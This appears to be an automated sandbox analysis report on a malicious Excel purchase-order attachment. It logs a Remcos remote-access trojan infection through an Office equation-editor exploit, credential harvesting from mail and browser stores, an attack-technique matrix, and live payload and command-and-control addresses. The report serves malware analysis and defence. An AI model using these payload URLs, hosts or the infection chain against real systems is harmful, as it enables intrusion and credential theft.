                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2148, type: MEMORYSTR
                Source: name.exeBinary or memory string: WIN_81
                Source: name.exeBinary or memory string: WIN_XP
                Source: name.exeBinary or memory string: WIN_XPe
                Source: name.exeBinary or memory string: WIN_VISTA
                Source: name.exeBinary or memory string: WIN_7
                Source: name.exeBinary or memory string: WIN_8
                Source: taskhostw[1].exe.9.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: C:\Windows\SysWOW64\svchost.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-FI789RJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-FI789R
                Source: Yara matchFile source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.485970456.0000000000604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_00226399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,10_2_00226399
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0022685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_0022685D
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012D6399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_012D6399
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012D685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_012D685D
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information121
                Scripting
                2
                Valid Accounts
                1
                Native API
                121
                Scripting
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                15
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts33
                Exploitation for Client Execution
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt2
                Valid Accounts
                2
                Valid Accounts
                21
                Obfuscated Files or Information
                1
                Credentials in Registry
                3
                File and Directory Discovery
                SMB/Windows Admin Shares2
                Email Collection
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron2
                Registry Run Keys / Startup Folder
                21
                Access Token Manipulation
                1
                DLL Side-Loading
                1
                Credentials In Files
                128
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                1
                Remote Access Software
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
                Process Injection
                1
                Masquerading
                LSA Secrets13
                Security Software Discovery
                SSH3
                Clipboard Data
                3
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                Registry Run Keys / Startup Folder
                2
                Valid Accounts
                Cached Domain Credentials1
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture124
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Virtualization/Sandbox Evasion
                DCSync4
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                Remote System Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532154 Sample: PO-00006799868.xls Startdate: 12/10/2024 Architecture: WINDOWS Score: 100 61 shuvi.io 2->61 91 Suricata IDS alerts for network traffic 2->91 93 Found malware configuration 2->93 95 Malicious sample detected (through community Yara rule) 2->95 97 21 other signatures 2->97 10 EXCEL.EXE 61 39 2->10         started        14 wscript.exe 1 2->14         started        signatures3 process4 dnsIp5 73 shuvi.io 188.114.96.3, 443, 49161, 49166 CLOUDFLARENETUS European Union 10->73 75 104.168.7.25, 49162, 49169, 49170 AS-COLOCROSSINGUS United States 10->75 59 C:\Users\user\...\PO-00006799868.xls (copy), Composite 10->59 dropped 17 taskhostw.exe 6 10->17         started        21 WINWORD.EXE 348 31 10->21         started        127 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->127 24 name.exe 2 14->24         started        file6 signatures7 process8 dnsIp9 45 C:\Users\user\AppData\Local\...\name.exe, PE32 17->45 dropped 77 Binary is likely a compiled AutoIt script file 17->77 79 Machine Learning detection for dropped file 17->79 26 name.exe 3 17->26         started        69 shuvi.io 21->69 71 188.114.97.3, 443, 49163, 49164 CLOUDFLARENETUS European Union 21->71 47 C:\Users\user\AppData\...\shuvi.io.url, MS 21->47 dropped 49 C:\Users\user\AppData\Roaming\...\7al0eY.url, MS 21->49 dropped 51 ~WRF{8ACACCBE-F49B...F-59EF5D64236E}.tmp, Composite 21->51 dropped 81 Microsoft Office launches external ms-search protocol handler (WebDAV) 21->81 83 Office viewer loads remote template 21->83 85 Microsoft Office drops suspicious files 21->85 30 EQNEDT32.EXE 12 21->30         started        87 Writes to foreign memory regions 24->87 89 Maps a DLL or memory area into another process 24->89 32 svchost.exe 24->32         started        file10 signatures11 process12 file13 53 C:\Users\user\AppData\Roaming\...\name.vbs, data 26->53 dropped 113 Binary is likely a compiled AutoIt script file 26->113 115 Machine Learning detection for dropped file 26->115 117 Drops VBS files to the startup folder 26->117 125 3 other signatures 26->125 34 svchost.exe 3 10 26->34         started        55 C:\Users\user\AppData\Roaming\taskhostw.exe, PE32 30->55 dropped 57 C:\Users\user\AppData\...\taskhostw[1].exe, PE32 30->57 dropped 119 Office equation editor establishes network connection 30->119 121 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 30->121 123 Detected Remcos RAT 32->123 signatures14 process15 dnsIp16 63 geoplugin.net 34->63 65 geoplugin.net 178.237.33.50, 49173, 80 ATOM86-ASATOM86NL Netherlands 34->65 67 107.173.4.16, 2404, 49171, 49172 AS-COLOCROSSINGUS United States 34->67 99 System process connects to network (likely due to code injection or exploit) 34->99 101 Detected Remcos RAT 34->101 103 Maps a DLL or memory area into another process 34->103 38 svchost.exe 1 34->38         started        41 svchost.exe 1 34->41         started        43 svchost.exe 11 34->43         started        signatures17 process18 signatures19 105 Tries to steal Instant Messenger accounts or passwords 38->105 107 Tries to steal Mail credentials (via file / registry access) 38->107 109 Searches for Windows Mail specific files 38->109 111 Tries to harvest and steal browser information (history, passwords, etc) 41->111

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                PO-00006799868.xls13%ReversingLabsDocument-PDF.Trojan.Heuristic
                PO-00006799868.xls14%VirustotalBrowse
                PO-00006799868.xls100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8ACACCBE-F49B-438C-81AF-59EF5D64236E}.tmp100%AviraEXP/CVE-2017-11882.Gen
                C:\Users\user\AppData\Local\directory\name.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\taskhostw.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\taskhostw[1].exe100%Joe Sandbox ML
                No Antivirus matches
                SourceDetectionScannerLabelLink
                shuvi.io0%VirustotalBrowse
                geoplugin.net0%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://www.imvu.comr0%URL Reputationsafe
                https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                http://geoplugin.net/json.gp/C0%URL Reputationsafe
                http://www.imvu.com0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                http://www.ebuddy.com0%URL Reputationsafe
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_0%VirustotalBrowse
                https://shuvi.io/0%VirustotalBrowse
                https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=90%VirustotalBrowse
                https://support.google.com/chrome/?p=plugin_flash0%VirustotalBrowse
                http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png0%VirustotalBrowse
                http://b.scorecardresearch.com/beacon.js0%VirustotalBrowse
                http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html0%VirustotalBrowse
                http://cache.btrll.com/default/Pix-1x1.gif0%VirustotalBrowse
                http://acdn.adnxs.com/ast/ast.js0%VirustotalBrowse
                http://pr-bh.ybp.yahoo.com/sync/msft/16145220553121086830%VirustotalBrowse
                http://o.aolcdn.com/ads/adswrappermsni.js0%VirustotalBrowse
                http://cdn.taboola.com/libtrc/msn-home-network/loader.js0%VirustotalBrowse
                https://www.google.com0%VirustotalBrowse
                https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=10%VirustotalBrowse
                http://www.msn.com/de-de/?ocid=iehp0%VirustotalBrowse
                http://static.chartbeat.com/js/chartbeat.js0%VirustotalBrowse
                http://www.msn.com/?ocid=iehp0%VirustotalBrowse
                https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=10330%VirustotalBrowse
                https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%VirustotalBrowse
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%0%VirustotalBrowse
                https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%30%VirustotalBrowse
                http://geoplugin.net/json.gpR0%VirustotalBrowse
                http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js0%VirustotalBrowse
                https://shuvi.io/7al0eY0%VirustotalBrowse
                https://www.ccleaner.com/go/app_cc_pro_trialkey0%VirustotalBrowse
                http://www.nirsoft.net/0%VirustotalBrowse
                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh0%VirustotalBrowse
                https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=90%VirustotalBrowse
                http://p.rfihub.com/cm?in=1&pub=345&userid=16145220553121086830%VirustotalBrowse
                https://support.google.com/chrome/?p=plugin_fl0%VirustotalBrowse
                http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(0%VirustotalBrowse
                NameIPActiveMaliciousAntivirus DetectionReputation
                shuvi.io
                188.114.96.3
                truetrueunknown
                geoplugin.net
                178.237.33.50
                truetrueunknown
                NameMaliciousAntivirus DetectionReputation
                http://104.168.7.25/450/taskhostw.exetrue
                  unknown
                  https://shuvi.io/7al0eYfalseunknown
                  http://geoplugin.net/json.gptrue
                  • URL Reputation: safe
                  unknown
                  http://104.168.7.25/xampp/ew/wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat.doctrue
                    unknown
                    107.173.4.16true
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://b.scorecardresearch.com/beacon.jsbhv35FF.tmp.13.drfalseunknown
                      http://104.168.7.25/450/taskhostw.exennC:EQNEDT32.EXE, 00000009.00000002.449947094.000000000065F000.00000004.00000020.00020000.00000000.sdmptrue
                        unknown
                        http://acdn.adnxs.com/ast/ast.jsbhv35FF.tmp.13.drfalseunknown
                        http://www.imvu.comrsvchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhv35FF.tmp.13.drfalseunknown
                        https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhv35FF.tmp.13.drfalseunknown
                        https://shuvi.io/shuvi.io.url.4.drfalseunknown
                        https://support.google.com/chrome/?p=plugin_flashsvchost.exe, 0000000D.00000003.467652223.0000000000525000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhv35FF.tmp.13.drfalseunknown
                        https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhv35FF.tmp.13.drfalseunknown
                        http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhv35FF.tmp.13.drfalseunknown
                        https://deff.nelreports.net/api/report?cat=msnbhv35FF.tmp.13.drfalse
                        • URL Reputation: safe
                        unknown
                        https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhv35FF.tmp.13.drfalseunknown
                        http://www.nirsoft.netXBsvchost.exe, 0000000D.00000002.467921215.0000000000184000.00000004.00000010.00020000.00000000.sdmpfalse
                          unknown
                          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comsvchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            unknown
                            http://cache.btrll.com/default/Pix-1x1.gifbhv35FF.tmp.13.drfalseunknown
                            http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhv35FF.tmp.13.drfalseunknown
                            https://www.google.comsvchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                            http://geoplugin.net/json.gp/Cname.exe, 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://o.aolcdn.com/ads/adswrappermsni.jsbhv35FF.tmp.13.drfalseunknown
                            http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv35FF.tmp.13.drfalseunknown
                            http://www.msn.com/?ocid=iehpbhv35FF.tmp.13.drfalseunknown
                            http://104.168.7.25/450/taskhostw.exegu4EQNEDT32.EXE, 00000009.00000002.449947094.000000000065F000.00000004.00000020.00020000.00000000.sdmptrue
                              unknown
                              https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv35FF.tmp.13.drfalseunknown
                              http://static.chartbeat.com/js/chartbeat.jsbhv35FF.tmp.13.drfalseunknown
                              http://www.msn.com/de-de/?ocid=iehpbhv35FF.tmp.13.drfalseunknown
                              https://shuvi.io/7al0eYyX68730000.0.dr, ~DFF2F9DC4D2772FBCE.TMP.0.drfalse
                                unknown
                                http://geoplugin.net/json.gpRsvchost.exe, 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv35FF.tmp.13.drfalseunknown
                                http://www.nirsoft.net/svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                http://104.168.7.25/450/taskhostw.exedvEQNEDT32.EXE, 00000009.00000002.449947094.000000000065F000.00000004.00000020.00020000.00000000.sdmptrue
                                  unknown
                                  https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv35FF.tmp.13.drfalseunknown
                                  http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv35FF.tmp.13.drfalseunknown
                                  http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv35FF.tmp.13.drfalseunknown
                                  https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv35FF.tmp.13.drfalseunknown
                                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv35FF.tmp.13.drfalseunknown
                                  http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv35FF.tmp.13.drfalseunknown
                                  https://www.ccleaner.com/go/app_cc_pro_trialkeybhv35FF.tmp.13.drfalseunknown
                                  https://support.google.com/chrome/?p=plugin_flsvchost.exe, 0000000D.00000003.467821156.0000000000525000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                  https://contextual.media.net/8/nrrV73987.jsbhv35FF.tmp.13.drfalse
                                    unknown
                                    http://www.imvu.comsvchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.464109574.0000000001D79000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://contextual.media.net/bhv35FF.tmp.13.drfalse
                                      unknown
                                      http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv35FF.tmp.13.drfalse
                                        unknown
                                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv35FF.tmp.13.drfalse
                                          unknown
                                          http://geoplugin.net/json.gp~svchost.exe, 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://www.msn.com/bhv35FF.tmp.13.drfalse
                                              unknown
                                              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv35FF.tmp.13.drfalse
                                                unknown
                                                http://www.imvu.com/Ssvchost.exe, 0000000F.00000002.463895380.00000000001DC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv35FF.tmp.13.drfalse
                                                    unknown
                                                    http://104.168.7.25/450/taskhostw.exejEQNEDT32.EXE, 00000009.00000002.449947094.000000000065F000.00000004.00000020.00020000.00000000.sdmptrue
                                                      unknown
                                                      http://cdn.at.atwola.com/_media/uac/msn.htmlbhv35FF.tmp.13.drfalse
                                                        unknown
                                                        http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv35FF.tmp.13.drfalse
                                                          unknown
                                                          https://support.google.com/chrome/svchost.exe, 0000000D.00000003.467821156.0000000000525000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://policies.yahoo.com/w3c/p3p.xmlbhv35FF.tmp.13.drfalse
                                                              unknown
                                                              http://www.msn.com/advertisement.ad.jsbhv35FF.tmp.13.drfalse
                                                                unknown
                                                                http://www.ebuddy.comsvchost.exe, 0000000C.00000002.1055254111.00000000003A0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 0000000F.00000002.463962173.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                188.114.97.3
                                                                unknownEuropean Union
                                                                13335CLOUDFLARENETUSfalse
                                                                188.114.96.3
                                                                shuvi.ioEuropean Union
                                                                13335CLOUDFLARENETUStrue
                                                                104.168.7.25
                                                                unknownUnited States
                                                                36352AS-COLOCROSSINGUStrue
                                                                107.173.4.16
                                                                unknownUnited States
                                                                36352AS-COLOCROSSINGUStrue
                                                                178.237.33.50
                                                                geoplugin.netNetherlands
                                                                8455ATOM86-ASATOM86NLtrue
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1532154
                                                                Start date and time:2024-10-12 16:38:18 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 12m 22s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                Number of analysed new started processes analysed:20
                                                                Number of new started drivers analysed:1
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • GSI enabled (VBA)
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:PO-00006799868.xls
                                                                Detection:MAL
                                                                Classification:mal100.phis.troj.spyw.expl.evad.winXLS@20/40@9/5
                                                                EGA Information:
                                                                • Successful, ratio: 66.7%
                                                                HCA Information:
                                                                • Successful, ratio: 99%
                                                                • Number of executed functions: 68
                                                                • Number of non-executed functions: 220
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .xls
